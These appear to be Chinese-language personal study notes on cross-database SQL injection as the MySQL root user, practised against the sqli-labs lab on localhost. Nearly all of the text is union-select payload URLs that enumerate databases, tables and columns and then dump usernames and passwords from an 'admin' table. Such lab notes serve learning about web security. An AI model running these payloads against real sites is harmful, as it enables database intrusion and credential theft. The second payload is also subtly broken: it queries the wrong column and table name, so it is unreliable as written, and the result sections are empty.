（2020上半年第7天）小迪网络安全笔记（操作④）Root用户注入攻击

Root用户注入攻击，必须是root，必须是mysql，必须两个数据库都在mysql里面
①获取所有数据库名
②获取指定数据库名injection的表名信息
③获取指定表名admin的列名信息

跨库操作：
①获取所有数据库名
Url：http://127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata–+
效果：

②获取指定数据库名injection的表名信息
Url:http://127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.table where table_schema=’injection’–+
效果：

③获取指定表名admin的列名信息
Url:http://127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’admin’ and table_schema=’injection’–+
效果：

④获取其他数据库的数据：
Url：http://127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,user,pass from injection（injection这里不写的话会默认本数据库）.admin